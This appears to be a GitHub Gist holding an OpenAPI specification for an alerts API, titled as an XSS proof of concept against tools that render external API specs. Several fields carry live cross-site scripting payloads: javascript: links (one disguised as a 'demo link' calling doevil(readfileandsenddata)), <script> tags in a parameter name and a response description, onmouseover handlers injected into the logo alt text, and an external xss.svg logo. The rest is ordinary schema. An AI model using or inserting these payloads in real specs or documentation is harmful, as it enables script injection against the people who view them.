Last active
August 9, 2021 22:09
-
-
Save xElkomy/e21a68e6ba946d7da3e4dc9ddfd31953 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| "components": { | |
| "parameters": { | |
| "alert": { | |
| "description": "[xElkomyistoooooooooooooooooooooooooooooooooooooooooooooooooooo](javascript:alert('XSS'))", | |
| "explode": false, | |
| "in": "path", | |
| "name": "<script>console.log(‘000000000000000000dad0000000000000000000');</script>", | |
| "required": true, | |
| "schema": { | |
| "example": "alt-asdf1234", | |
| "pattern": "^[A-Za-z][A-Za-z0-9-]+$", | |
| "type": "string" | |
| }, | |
| "style": "simple" | |
| } | |
| }, | |
| "responses": { | |
| "ApiErrorsResponse": { | |
| "content": { | |
| "application/json": { | |
| "schema": { | |
| "properties": { | |
| "errors": { | |
| "description": "List of errors that occurred while processing the request.", | |
| "items": { | |
| "$ref": "#/components/schemas/ApiError" | |
| }, | |
| "minItems": 1, | |
| "type": "array" | |
| } | |
| }, | |
| "type": "object" | |
| } | |
| } | |
| }, | |
| "description": "<script>alert('xElkomy')</script>" | |
| } | |
| }, | |
| "schemas": { | |
| "Alert": { | |
| "example": { | |
| "crit": { | |
| "operator": "<", | |
| "value": 5 | |
| }, | |
| "info": { | |
| "operator": "<", | |
| "value": 5 | |
| }, | |
| "name": "name", | |
| "post_to": "", | |
| "warn": { | |
| "operator": "<", | |
| "value": 5 | |
| } | |
| }, | |
| "properties": { | |
| "crit": { | |
| "$ref": "#/components/schemas/threshold" | |
| }, | |
| "field": { | |
| "$ref": "#/components/schemas/field" | |
| }, | |
| "info": { | |
| "$ref": "#/components/schemas/threshold" | |
| }, | |
| "name": { | |
| "description": "unique name for this alert", | |
| "pattern": "^[A-Za-z][A-Za-z0-9-]+$", | |
| "type": "string" | |
| }, | |
| "operation": { | |
| "$ref": "#/components/schemas/operation" | |
| }, | |
| "period": { | |
| "$ref": "#/components/schemas/period" | |
| }, | |
| "post_to": { | |
| "pattern": "^https://" | |
| }, | |
| "warn": { | |
| "$ref": "#/components/schemas/threshold" | |
| }, | |
| "window": { | |
| "$ref": "#/components/schemas/window" | |
| } | |
| }, | |
| "required": [ | |
| "field", | |
| "name", | |
| "operation", | |
| "period", | |
| "post_to", | |
| "window" | |
| ], | |
| "type": "object" | |
| }, | |
| "ApiError": { | |
| "properties": { | |
| "detail": { | |
| "description": "Explanation of what exactly went wrong.", | |
| "type": "string" | |
| }, | |
| "href": { | |
| "description": "Request URL.", | |
| "type": "string" | |
| }, | |
| "status": { | |
| "description": "HTTP status code.", | |
| "type": "integer" | |
| }, | |
| "title": { | |
| "description": "High-level reason of why the request failed.", | |
| "type": "string" | |
| } | |
| }, | |
| "type": "object" | |
| }, | |
| "CreateAlertRequest": { | |
| "$ref": "#/components/schemas/Alert" | |
| }, | |
| "field": { | |
| "description": "Data to query", | |
| "enum": [ | |
| "record_usage.count", | |
| "upstream_responses.count", | |
| "upstream_traffic.traffic_bytes", | |
| "upstream_latency.count" | |
| ], | |
| "type": "string" | |
| }, | |
| "inline_response_200": { | |
| "example": { | |
| "alerts": [ | |
| { | |
| "crit": { | |
| "operator": "<", | |
| "value": 5 | |
| }, | |
| "info": { | |
| "operator": "<", | |
| "value": 5 | |
| }, | |
| "name": "name", | |
| "post_to": "", | |
| "warn": { | |
| "operator": "<", | |
| "value": 5 | |
| } | |
| }, | |
| { | |
| "crit": { | |
| "operator": "<", | |
| "value": 5 | |
| }, | |
| "info": { | |
| "operator": "<", | |
| "value": 5 | |
| }, | |
| "name": "name", | |
| "post_to": "", | |
| "warn": { | |
| "operator": "<", | |
| "value": 5 | |
| } | |
| } | |
| ] | |
| }, | |
| "properties": { | |
| "alerts": { | |
| "description": "List of stored values along with their aliases.", | |
| "items": { | |
| "$ref": "#/components/schemas/Alert" | |
| }, | |
| "type": "array" | |
| } | |
| } | |
| }, | |
| "inline_response_200_1": { | |
| "example": { | |
| "alerts": [ | |
| { | |
| "crit": { | |
| "operator": "<", | |
| "value": 5 | |
| }, | |
| "info": { | |
| "operator": "<", | |
| "value": 5 | |
| }, | |
| "name": "name", | |
| "post_to": "", | |
| "warn": { | |
| "operator": "<", | |
| "value": 5 | |
| } | |
| } | |
| ] | |
| }, | |
| "properties": { | |
| "alerts": { | |
| "description": "The retrieved alert.", | |
| "items": { | |
| "$ref": "#/components/schemas/Alert" | |
| }, | |
| "maxItems": 1, | |
| "minItems": 1, | |
| "type": "array" | |
| } | |
| } | |
| }, | |
| "operation": { | |
| "enum": [ | |
| "sum", | |
| "mean", | |
| "max", | |
| "min" | |
| ], | |
| "type": "string" | |
| }, | |
| "period": { | |
| "description": "How often to run this check", | |
| "enum": [ | |
| "1m", | |
| "5m", | |
| "10m", | |
| "30m", | |
| "60m", | |
| "12h", | |
| "24h" | |
| ], | |
| "type": "string" | |
| }, | |
| "threshold": { | |
| "example": { | |
| "operator": "<", | |
| "value": 5 | |
| }, | |
| "properties": { | |
| "operator": { | |
| "enum": [ | |
| "<", | |
| "<=", | |
| ">", | |
| ">=", | |
| "==" | |
| ], | |
| "type": "string" | |
| }, | |
| "value": { | |
| "description": "Positive integer value", | |
| "example": 5, | |
| "type": "integer" | |
| } | |
| }, | |
| "required": [ | |
| "operator", | |
| "value" | |
| ], | |
| "type": "object" | |
| }, | |
| "window": { | |
| "description": "Window to query data across", | |
| "enum": [ | |
| "1m", | |
| "5m", | |
| "10m", | |
| "30m", | |
| "60m", | |
| "12h", | |
| "24h" | |
| ], | |
| "type": "string" | |
| } | |
| }, | |
| "securitySchemes": { | |
| "jwt": { | |
| "bearerFormat": "JWT", | |
| "scheme": "bearer", | |
| "type": "http", | |
| "x-bearerInfoFunc": "impi.security.decode_token" | |
| } | |
| } | |
| }, | |
| "externalDocs": { | |
| "description": "xElkomy is here", | |
| "url": "https://xelkomy.com" | |
| }, | |
| "info": { | |
| "contact": { | |
| "email": "[email protected]" | |
| }, | |
| "description": "xelkomyishere # [Here is the demo link we provided you](javascript:doevil(readfileandsenddata)) #xElkomy PoC Inject External JsonFile \n", | |
| "title": "xElkomy PoC", | |
| "version": "0.1.0", | |
| "x-logo": { | |
| "altText": "Very Good Security Logo #![a\"onmouseover=alert`1`](https://www.google.com/image.png\"'onmouseover=alert(1)'", | |
| "href": "https://www.xelkomy.com", | |
| "url": "https://mytool-xelkomy.s3.eu-central-1.amazonaws.com/xss.svg" | |
| } | |
| }, | |
| "openapi": "3.0.0", | |
| "paths": { | |
| "/alerts": { | |
| "get": { | |
| "description": "Show all alerts\n", | |
| "operationId": "fetch_alerts", | |
| "responses": { | |
| "200": { | |
| "content": { | |
| "application/json": { | |
| "schema": { | |
| "$ref": "#/components/schemas/inline_response_200" | |
| } | |
| } | |
| }, | |
| "description": "OK" | |
| } | |
| }, | |
| "summary": "List alerts", | |
| "tags": [ | |
| "alerts" | |
| ], | |
| "x-openapi-router-controller": "openapi_server.controllers.alerts_controller" | |
| } | |
| }, | |
| "/alerts/{alert}": { | |
| "delete": { | |
| "description": "Removes a single alert.\n", | |
| "operationId": "delete_alert", | |
| "parameters": [ | |
| { | |
| "description": "Alert to operate on.", | |
| "explode": false, | |
| "in": "path", | |
| "name": "alert", | |
| "required": true, | |
| "schema": { | |
| "example": "alt-asdf1234", | |
| "pattern": "^[A-Za-z][A-Za-z0-9-]+$", | |
| "type": "string" | |
| }, | |
| "style": "simple" | |
| } | |
| ], | |
| "responses": { | |
| "204": { | |
| "description": "No Content" | |
| } | |
| }, | |
| "summary": "Delete an alert", | |
| "tags": [ | |
| "alerts" | |
| ], | |
| "x-openapi-router-controller": "openapi_server.controllers.alerts_controller" | |
| }, | |
| "get": { | |
| "description": "Retrieves an alert", | |
| "operationId": "get_alert", | |
| "parameters": [ | |
| { | |
| "description": "Alert to operate on.", | |
| "explode": false, | |
| "in": "path", | |
| "name": "alert", | |
| "required": true, | |
| "schema": { | |
| "example": "alt-asdf1234", | |
| "pattern": "^[A-Za-z][A-Za-z0-9-]+$", | |
| "type": "string" | |
| }, | |
| "style": "simple" | |
| } | |
| ], | |
| "responses": { | |
| "200": { | |
| "content": { | |
| "application/json": { | |
| "schema": { | |
| "$ref": "#/components/schemas/inline_response_200_1" | |
| } | |
| } | |
| }, | |
| "description": "OK" | |
| } | |
| }, | |
| "summary": "Get an alert", | |
| "tags": [ | |
| "alerts" | |
| ], | |
| "x-openapi-router-controller": "openapi_server.controllers.alerts_controller" | |
| }, | |
| "post": { | |
| "description": "Creates a single alert.\n", | |
| "operationId": "create_alert", | |
| "parameters": [ | |
| { | |
| "description": "Alert to operate on.", | |
| "explode": false, | |
| "in": "path", | |
| "name": "alert", | |
| "required": true, | |
| "schema": { | |
| "example": "alt-asdf1234", | |
| "pattern": "^[A-Za-z][A-Za-z0-9-]+$", | |
| "type": "string" | |
| }, | |
| "style": "simple" | |
| } | |
| ], | |
| "requestBody": { | |
| "content": { | |
| "application/json": { | |
| "schema": { | |
| "$ref": "#/components/schemas/CreateAlertRequest" | |
| } | |
| } | |
| } | |
| }, | |
| "responses": { | |
| "201": { | |
| "content": { | |
| "application/json": { | |
| "schema": { | |
| "$ref": "#/components/schemas/Alert" | |
| } | |
| } | |
| }, | |
| "description": "Created" | |
| } | |
| }, | |
| "summary": "Create an alert", | |
| "tags": [ | |
| "alerts" | |
| ], | |
| "x-openapi-router-controller": "openapi_server.controllers.alerts_controller" | |
| }, | |
| "put": { | |
| "description": "Update an alert\n", | |
| "operationId": "update_alert", | |
| "parameters": [ | |
| { | |
| "description": "Alert to operate on.", | |
| "explode": false, | |
| "in": "path", | |
| "name": "alert", | |
| "required": true, | |
| "schema": { | |
| "example": "alt-asdf1234", | |
| "pattern": "^[A-Za-z][A-Za-z0-9-]+$", | |
| "type": "string" | |
| }, | |
| "style": "simple" | |
| } | |
| ], | |
| "requestBody": { | |
| "content": { | |
| "application/json": { | |
| "schema": { | |
| "$ref": "#/components/schemas/CreateAlertRequest" | |
| } | |
| } | |
| } | |
| }, | |
| "responses": { | |
| "200": { | |
| "description": "OK" | |
| } | |
| }, | |
| "summary": "Update an alert", | |
| "tags": [ | |
| "alerts" | |
| ], | |
| "x-openapi-router-controller": "openapi_server.controllers.alerts_controller" | |
| } | |
| }, | |
| "/health": { | |
| "get": { | |
| "description": "Healthy or no", | |
| "operationId": "get_health", | |
| "responses": { | |
| "200": { | |
| "content": { | |
| "text/plain": { | |
| "schema": { | |
| "example": "pong", | |
| "type": "string" | |
| } | |
| } | |
| }, | |
| "description": "OK" | |
| } | |
| }, | |
| "summary": "Return health of API", | |
| "x-openapi-router-controller": "openapi_server.controllers.default_controller" | |
| } | |
| } | |
| }, | |
| "security": [ | |
| { | |
| "jwt": [] | |
| } | |
| ], | |
| "servers": [ | |
| { | |
| "url": "" | |
| } | |
| ] | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment